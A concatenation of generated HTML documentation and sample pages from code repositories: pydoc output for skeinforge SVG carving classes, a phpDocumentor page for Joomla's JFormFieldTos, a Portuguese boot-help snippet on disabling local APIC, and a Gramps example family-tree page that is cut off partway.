<dl><dt><a name="Path-getTransformedVertexes"><strong>getTransformedVertexes</strong></a>(self)</dt><dd><tt>Get all transformed vertexes.</tt></dd></dl>
<dl><dt><a name="Path-getTriangleMeshes"><strong>getTriangleMeshes</strong></a>(self)</dt><dd><tt>Get all triangleMeshes.</tt></dd></dl>
<dl><dt><a name="Path-getType"><strong>getType</strong></a>(self)</dt><dd><tt>Get type.</tt></dd></dl>
<dl><dt><a name="Path-getVertexes"><strong>getVertexes</strong></a>(self)</dt><dd><tt>Get all vertexes.</tt></dd></dl>
<dl><dt><a name="Path-getVisible"><strong>getVisible</strong></a>(self)</dt><dd><tt>Get visible.</tt></dd></dl>
<dl><dt><a name="Path-getXMLLocalName"><strong>getXMLLocalName</strong></a>(self)</dt><dd><tt>Get xml local name.</tt></dd></dl>
<dl><dt><a name="Path-setToElementNode"><strong>setToElementNode</strong></a>(self, elementNode)</dt><dd><tt>Set the shape of this carvable object info.</tt></dd></dl>
</td></tr></table> <p>
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="#ffc8d8">
<td colspan=3 valign=bottom> <br>
<font color="#000000" face="helvetica, arial"><a name="SVGFabricationCarving">class <strong>SVGFabricationCarving</strong></a></font></td></tr>
<tr bgcolor="#ffc8d8"><td rowspan=2><tt> </tt></td>
<td colspan=2><tt>An svg carving.<br> </tt></td></tr>
<tr><td> </td>
<td width="100%">Methods defined here:<br>
<dl><dt><a name="SVGFabricationCarving-__init__"><strong>__init__</strong></a>(self, addLayerTemplate, elementNode)</dt><dd><tt>Add empty lists.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-__repr__"><strong>__repr__</strong></a>(self)</dt><dd><tt>Get the string representation of this carving.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-addXML"><strong>addXML</strong></a>(self, depth, output)</dt><dd><tt>Add xml for this object.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-getCarveCornerMaximum"><strong>getCarveCornerMaximum</strong></a>(self)</dt><dd><tt>Get the corner maximum of the vertexes.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-getCarveCornerMinimum"><strong>getCarveCornerMinimum</strong></a>(self)</dt><dd><tt>Get the corner minimum of the vertexes.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-getCarveLayerThickness"><strong>getCarveLayerThickness</strong></a>(self)</dt><dd><tt>Get the layer thickness.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-getCarveRotatedBoundaryLayers"><strong>getCarveRotatedBoundaryLayers</strong></a>(self)</dt><dd><tt>Get the rotated boundary layers.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-getCarvedSVG"><strong>getCarvedSVG</strong></a>(self)</dt><dd><tt>Get the carved svg text.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-getFabmetheusXML"><strong>getFabmetheusXML</strong></a>(self)</dt><dd><tt>Return the fabmetheus XML.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-getInterpretationSuffix"><strong>getInterpretationSuffix</strong></a>(self)</dt><dd><tt>Return the suffix for a carving.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-processSVGElement"><strong>processSVGElement</strong></a>(self, fileName)</dt><dd><tt>Parse SVG element and store the layers.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-setCarveImportRadius"><strong>setCarveImportRadius</strong></a>(self, importRadius)</dt><dd><tt>Set the import radius.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-setCarveInfillInDirectionOfBridge"><strong>setCarveInfillInDirectionOfBridge</strong></a>(self, infillInDirectionOfBridge)</dt><dd><tt>Set the infill in direction of bridge.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-setCarveIsCorrectMesh"><strong>setCarveIsCorrectMesh</strong></a>(self, isCorrectMesh)</dt><dd><tt>Set the is correct mesh flag.</tt></dd></dl>
<dl><dt><a name="SVGFabricationCarving-setCarveLayerThickness"><strong>setCarveLayerThickness</strong></a>(self, layerThickness)</dt><dd><tt>Set the layer thickness.</tt></dd></dl>
</td></tr></table></td></tr></table><p>
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="#eeaa77">
<td colspan=3 valign=bottom> <br>
<font color="#ffffff" face="helvetica, arial"><big><strong>Functions</strong></big></font></td></tr>
<tr><td bgcolor="#eeaa77"><tt> </tt></td><td> </td>
<td width="100%"><dl><dt><a name="-convertElementNode"><strong>convertElementNode</strong></a>(elementNode, geometryOutput)</dt><dd><tt>Convert the xml element by geometryOutput.</tt></dd></dl>
<dl><dt><a name="-convertElementNodeByPath"><strong>convertElementNodeByPath</strong></a>(elementNode, geometryOutput)</dt><dd><tt>Convert the xml element to a path xml element.</tt></dd></dl>
<dl><dt><a name="-convertElementNodeRenameByPaths"><strong>convertElementNodeRenameByPaths</strong></a>(elementNode, geometryOutput)</dt><dd><tt>Convert the xml element to a path xml element and add paths.</tt></dd></dl>
<dl><dt><a name="-createLinkPath"><strong>createLinkPath</strong></a>(elementNode)</dt><dd><tt>Create and link a path object.</tt></dd></dl>
<dl><dt><a name="-processElementNode"><strong>processElementNode</strong></a>(elementNode)</dt><dd><tt>Process the xml element.</tt></dd></dl>
</td></tr></table><p>
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="#55aa55">
<td colspan=3 valign=bottom> <br>
<font color="#ffffff" face="helvetica, arial"><big><strong>Data</strong></big></font></td></tr>
<tr><td bgcolor="#55aa55"><tt> </tt></td><td> </td>
<td width="100%"><strong>__author__</strong> = 'Enrique Perez (perez_enrique@yahoo.com)'<br>
<strong>__credits__</strong> = 'Art of Illusion <http://www.artofillusion.org/>'<br>
<strong>__date__</strong> = '$Date: 2008/02/05 $'<br>
<strong>__license__</strong> = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'<br>
<strong>absolute_import</strong> = _Feature((2, 5, 0, 'alpha', 1), (2, 7, 0, 'alpha', 0), 16384)</td></tr></table><p>
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="#7799ee">
<td colspan=3 valign=bottom> <br>
<font color="#ffffff" face="helvetica, arial"><big><strong>Author</strong></big></font></td></tr>
<tr><td bgcolor="#7799ee"><tt> </tt></td><td> </td>
<td width="100%">Enrique Perez (perez_enrique@yahoo.com)</td></tr></table><p>
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="#7799ee">
<td colspan=3 valign=bottom> <br>
<font color="#ffffff" face="helvetica, arial"><big><strong>Credits</strong></big></font></td></tr>
<tr><td bgcolor="#7799ee"><tt> </tt></td><td> </td>
<td width="100%">Art of Illusion <<a href="http://www.artofillusion.org/">http://www.artofillusion.org/</a>></td></tr></table>
</body></html> |
Joomla-Plugin/User-profile/JFormFieldTos.html | asika32764/Joomla-CMS-API-Document | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- template designed by Marco Von Ballmoos -->
<title>Docs For Class JFormFieldTos</title>
<link rel="stylesheet" href="../../media/stylesheet.css" />
<script src="../../media/lib/classTree.js"></script>
<script language="javascript" type="text/javascript">
var imgPlus = new Image();
var imgMinus = new Image();
imgPlus.src = "../../media/images/plus.png";
imgMinus.src = "../../media/images/minus.png";
function showNode(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
var oImg = document.layers["img" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
var oImg = document.all["img" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
var oImg = document.getElementById("img" + Node);
break;
}
oImg.src = imgMinus.src;
oTable.style.display = "block";
}
function hideNode(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
var oImg = document.layers["img" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
var oImg = document.all["img" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
var oImg = document.getElementById("img" + Node);
break;
}
oImg.src = imgPlus.src;
oTable.style.display = "none";
}
function nodeIsVisible(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
break;
}
return (oTable && oTable.style.display == "block");
}
function toggleNodeVisibility(Node){
if (nodeIsVisible(Node)){
hideNode(Node);
}else{
showNode(Node);
}
}
</script>
</head>
<body>
<div class="page-body">
<h2 class="class-name"><img src="../../media/images/Class_logo.png"
alt=" Class"
title=" Class"
style="vertical-align: middle"> JFormFieldTos</h2>
<a name="sec-description"></a>
<div class="info-box">
<div class="info-box-title">Description</div>
<div class="nav-bar">
<span class="disabled">Description</span> |
<a href="#sec-var-summary">Vars</a> (<a href="#sec-vars">details</a>)
| <a href="#sec-method-summary">Methods</a> (<a href="#sec-methods">details</a>)
</div>
<div class="info-box-body">
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Provides input for TOS</p>
<ul class="tags">
<li><span class="field">since:</span> 2.5.5</li>
</ul>
<p class="notes">
Located in <a class="field" href="_plugins---user---profile---fields---tos.php.html">/plugins/user/profile/fields/tos.php</a> (line <span class="field"><a href="../../filesource/fsource_Joomla-Plugin_User-profile_pluginsuserprofilefieldstos.php.html#a21">21</a></span>)
</p>
<pre><a href="../../Joomla-Platform/Form/JFormField.html">JFormField</a>
|
--<a href="../../Joomla-Platform/Form/JFormFieldRadio.html">JFormFieldRadio</a>
|
--JFormFieldTos</pre>
</div>
</div>
<a name="sec-var-summary"></a>
<div class="info-box">
<div class="info-box-title">Variable Summary</span></div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<span class="disabled">Vars</span> (<a href="#sec-vars">details</a>)
|
<a href="#sec-method-summary">Methods</a> (<a href="#sec-methods">details</a>)
</div>
<div class="info-box-body">
<div class="var-summary">
<div class="var-title">
<img src="../../media/images/Variable.png" alt=" " />
<span class="var-type">string</span>
<a href="#$type" title="details" class="var-name">$type</a>
</div>
</div>
</div>
</div>
<a name="sec-method-summary"></a>
<div class="info-box">
<div class="info-box-title">Method Summary</span></div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<a href="#sec-var-summary">Vars</a> (<a href="#sec-vars">details</a>)
|
<span class="disabled">Methods</span> (<a href="#sec-methods">details</a>)
</div>
<div class="info-box-body">
<div class="method-summary">
<div class="method-definition">
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-result">string</span>
<a href="#getLabel" title="details" class="method-name">getLabel</a>
()
</div>
</div>
</div>
</div>
<a name="sec-vars"></a>
<div class="info-box">
<div class="info-box-title">Variables</div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<a href="#sec-var-summary">Vars</a> (<span class="disabled">details</span>)
|
<a href="#sec-method-summary">Methods</a> (<a href="#sec-methods">details</a>)
</div>
<div class="info-box-body">
<a name="var$type" id="$type"><!-- --></A>
<div class="evenrow">
<div class="var-header">
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-type">string</span>
<span class="var-name">$type</span>
= <span class="var-default"> 'Tos'</span> (line <span class="line-number"><a href="../../filesource/fsource_Joomla-Plugin_User-profile_pluginsuserprofilefieldstos.php.html#a29">29</a></span>)
</span>
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">The form field type.</p>
<ul class="tags">
<li><span class="field">since:</span> 2.5.5</li>
<li><span class="field">access:</span> protected</li>
</ul>
<hr class="separator" />
<div class="notes">Redefinition of:</div>
<dl>
<dt><a href="../../Joomla-Platform/Form/JFormFieldRadio.html#var$type">JFormFieldRadio::$type</a></dt>
<dd>The form field type.</dd>
</dl>
</div>
<h4>Inherited Variables</h4>
<A NAME='inherited_vars'><!-- --></A>
<p>Inherited from <span class="classname"><a href="../../Joomla-Platform/Form/JFormField.html">JFormField</a></span></p>
<blockquote>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$autocomplete">JFormField::$autocomplete</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$autofocus">JFormField::$autofocus</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$class">JFormField::$class</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$count">JFormField::$count</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$default">JFormField::$default</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$description">JFormField::$description</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$disabled">JFormField::$disabled</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$element">JFormField::$element</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$fieldname">JFormField::$fieldname</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$form">JFormField::$form</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$formControl">JFormField::$formControl</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$generated_fieldname">JFormField::$generated_fieldname</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$group">JFormField::$group</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$hidden">JFormField::$hidden</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$hint">JFormField::$hint</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$id">JFormField::$id</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$input">JFormField::$input</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$label">JFormField::$label</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$labelClass">JFormField::$labelClass</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$multiple">JFormField::$multiple</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$name">JFormField::$name</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$onchange">JFormField::$onchange</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$onclick">JFormField::$onclick</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$pattern">JFormField::$pattern</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$readonly">JFormField::$readonly</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$repeat">JFormField::$repeat</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$required">JFormField::$required</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$size">JFormField::$size</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$spellcheck">JFormField::$spellcheck</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$translateDescription">JFormField::$translateDescription</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$translateHint">JFormField::$translateHint</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$translateLabel">JFormField::$translateLabel</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$validate">JFormField::$validate</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Form/JFormField.html#var$value">JFormField::$value</a></span><br>
</span>
</blockquote>
</div>
</div>
<a name="sec-methods"></a>
<div class="info-box">
<div class="info-box-title">Methods</div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<a href="#sec-var-summary">Vars</a> (<a href="#sec-vars">details</a>)
<a href="#sec-method-summary">Methods</a> (<span class="disabled">details</span>)
</div>
<div class="info-box-body">
<A NAME='method_detail'></A>
<a name="methodgetLabel" id="getLabel"><!-- --></a>
<div class="oddrow">
<div class="method-header">
<img src="../../media/images/Method.png" />
<span class="method-title">getLabel</span> (line <span class="line-number"><a href="../../filesource/fsource_Joomla-Plugin_User-profile_pluginsuserprofilefieldstos.php.html#a38">38</a></span>)
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Method to get the field label markup.</p>
<ul class="tags">
<li><span class="field">return:</span> The field label markup.</li>
<li><span class="field">since:</span> 2.5.5</li>
<li><span class="field">access:</span> protected</li>
</ul>
<div class="method-signature">
<span class="method-result">string</span>
<span class="method-name">
getLabel
</span>
()
</div>
<hr class="separator" />
<div class="notes">Redefinition of:</div>
<dl>
<dt><a href="../../Joomla-Platform/Form/JFormField.html#methodgetLabel">JFormField::getLabel()</a></dt>
<dd>Method to get the field label markup.</dd>
</dl>
</div>
<h4>Inherited Methods</h4>
<a name='inherited_methods'><!-- --></a>
<!-- =========== Summary =========== -->
<p>Inherited From <span class="classname"><a href="../../Joomla-Platform/Form/JFormFieldRadio.html">JFormFieldRadio</a></span></p>
<blockquote>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormFieldRadio.html#methodgetInput">JFormFieldRadio::getInput()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormFieldRadio.html#methodgetOptions">JFormFieldRadio::getOptions()</a></span><br>
</blockquote>
<!-- =========== Summary =========== -->
<p>Inherited From <span class="classname"><a href="../../Joomla-Platform/Form/JFormField.html">JFormField</a></span></p>
<blockquote>
<img src="../../media/images/Constructor.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#method__construct">JFormField::__construct()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#methodgetAttribute">JFormField::getAttribute()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#methodgetControlGroup">JFormField::getControlGroup()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#methodgetFieldName">JFormField::getFieldName()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#methodgetId">JFormField::getId()</a></span><br>
<img src="../../media/images/AbstractMethod.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#methodgetInput">JFormField::getInput()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#methodgetLabel">JFormField::getLabel()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#methodgetName">JFormField::getName()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#methodgetTitle">JFormField::getTitle()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#methodsetForm">JFormField::setForm()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#methodsetup">JFormField::setup()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#methodsetValue">JFormField::setValue()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#method__get">JFormField::__get()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Form/JFormField.html#method__set">JFormField::__set()</a></span><br>
</blockquote>
</div>
</div>
<p class="notes" id="credit">
Documentation generated on Tue, 19 Nov 2013 15:15:55 +0100 by <a href="http://www.phpdoc.org" target="_blank">phpDocumentor 1.4.3</a>
</p>
</div></body>
</html> |
themes/BlankOn/help-install/pt_BR/main::nolapic.html | mdamt/gfxboot-blankon | <h3>
<a name="nolapic">Instalação -- APIC local desabilitado</a>
</h3>
<p>Normalmente não há problemas com o APIC (Advanced Programmable Interrupt Controller - Controlador avançado de interrupção programável). Mas, se você acha que há algum problema, tente esta opção para inicializar sem o suporte à APIC local.</p>
<p>Por favor, não confunda isto com <a href="#noacpi">ACPI</a> (ACPI - Interface avançada de configuração e energia).</p>
|
gramps42/gramps/example_NAVWEB0/ppl/p/0/NWXJQC0OQB26BHRX0P.html | belissent/testing-example-reports | <!DOCTYPE html>
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-US">
<title>My Family Tree - Thornton, James Arthur</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mobile-web-app-capable" content="yes" />
<meta name="generator" content="Gramps 4.2.2 http://gramps-project.org/" />
<meta name="author" content="" />
<link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" />
<link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" />
<link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" />
<link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="header">
<h1 id="SiteTitle">My Family Tree</h1>
</div>
<div class="wrapper" id="nav" role="navigation">
<div class="container">
<ul class="menu" id="dropmenu">
<li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li>
<li><a href="../../../index.html" title="Surnames">Surnames</a></li>
<li><a href="../../../places.html" title="Places">Places</a></li>
<li><a href="../../../sources.html" title="Sources">Sources</a></li>
<li><a href="../../../media.html" title="Media">Media</a></li>
<li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li>
</ul>
</div>
</div>
<div class="content" id="IndividualDetail">
<h3>Thornton, James Arthur<sup><small> <a href="#sref1">1</a></small></sup></h3>
<div id="summaryarea">
<table class="infolist">
<tr>
<td class="ColumnAttribute">Birth Name</td>
<td class="ColumnValue">
Thornton, James Arthur
</td>
</tr>
<tr>
<td class="ColumnAttribute">Gramps ID</td>
<td class="ColumnValue">I0205</td>
</tr>
<tr>
<td class="ColumnAttribute">Gender</td>
<td class="ColumnValue">male</td>
</tr>
<tr>
<td class="ColumnAttribute">Age at Death</td>
<td class="ColumnValue">72 years, 4 months, 21 days</td>
</tr>
</table>
</div>
<div class="subsection" id="events">
<h4>Events</h4>
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Birth
</td>
<td class="ColumnDate">1911-07-12</td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Birth of Thornton, James Arthur
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
<tr>
<td class="ColumnEvent">
Death
</td>
<td class="ColumnDate">1983-12-02</td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Death of Thornton, James Arthur
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
<tr>
<td class="ColumnEvent">
Burial
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace">
<a href="../../../plc/t/t/ETXJQCEDKDJG6WNMTT.html" title="St, George, UT, USA">
St, George, UT, USA
</a>
</td>
<td class="ColumnDescription">
Burial of Thornton, James Arthur
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
</table>
</div>
<div class="subsection" id="parents">
<h4>Parents</h4>
<table class="infolist">
<thead>
<tr>
<th class="ColumnAttribute">Relation to main person</th>
<th class="ColumnValue">Name</th>
<th class="ColumnValue">Relation within this family (if not by birth)</th>
</tr>
</thead>
<tbody>
</tbody>
<tr>
<td class="ColumnAttribute">Father</td>
<td class="ColumnValue">
<a href="../../../ppl/2/o/5WXJQCRB8V835ESO2.html">Thornton, Arthur Otto<span class="grampsid"> [I0204]</span></a>
</td>
</tr>
<tr>
<td class="ColumnAttribute">Mother</td>
<td class="ColumnValue">
<a href="../../../ppl/8/b/VUXJQCE48G4ZOGERB8.html">Marín, Lilla Estella<span class="grampsid"> [I0202]</span></a>
</td>
</tr>
<tr>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue"> <a href="../../../ppl/p/0/NWXJQC0OQB26BHRX0P.html">Thornton, James Arthur<span class="grampsid"> [I0205]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Sister</td>
<td class="ColumnValue"> <a href="../../../ppl/2/s/UXXJQC113PYFEWQAS2.html">Thornton, Dorothy Eleanor<span class="grampsid"> [I0207]</span></a></td>
<td class="ColumnValue"></td>
</tr>
</table>
</div>
<div class="subsection" id="families">
<h4>Families</h4>
<table class="infolist">
<tr class="BeginFamily">
<td class="ColumnType"> </td>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue"><a href="" title="Family of Thornton, James Arthur and Lachance, Helen">Family of Thornton, James Arthur and Lachance, Helen<span class="grampsid"> [F0112]</span></a></td>
</tr>
<tr class="BeginFamily">
<td class="ColumnType">Married</td>
<td class="ColumnAttribute">Wife</td>
<td class="ColumnValue">
<a href="../../../ppl/x/f/ZP2KQCYV4DVF375TFX.html">Lachance, Helen<span class="grampsid"> [I0484]</span></a>
</td>
</tr>
<tr>
<td class="ColumnType"> </td>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue">
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Marriage
</td>
<td class="ColumnDate">1945-09-08</td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Marriage of Thornton, James Arthur and Lachance, Helen
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
</table>
</td>
<tr>
<td class="ColumnType"> </td>
<td class="ColumnAttribute">Children</td>
<td class="ColumnValue">
<ol>
<li>
<a href="../../../ppl/w/e/CU2KQCSM52TSK38XEW.html">Thornton, Phillip James<span class="grampsid"> [I0490]</span></a>
</li>
</ol>
</td>
</tr>
</tr>
</table>
</div>
<div class="subsection" id="pedigree">
<h4>Pedigree</h4>
<ol class="pedigreegen">
<li>
<a href="../../../ppl/2/o/5WXJQCRB8V835ESO2.html">Thornton, Arthur Otto<span class="grampsid"> [I0204]</span></a>
<ol>
<li class="spouse">
<a href="../../../ppl/8/b/VUXJQCE48G4ZOGERB8.html">Marín, Lilla Estella<span class="grampsid"> [I0202]</span></a>
<ol>
<li class="thisperson">
Thornton, James Arthur
<ol class="spouselist">
<li class="spouse">
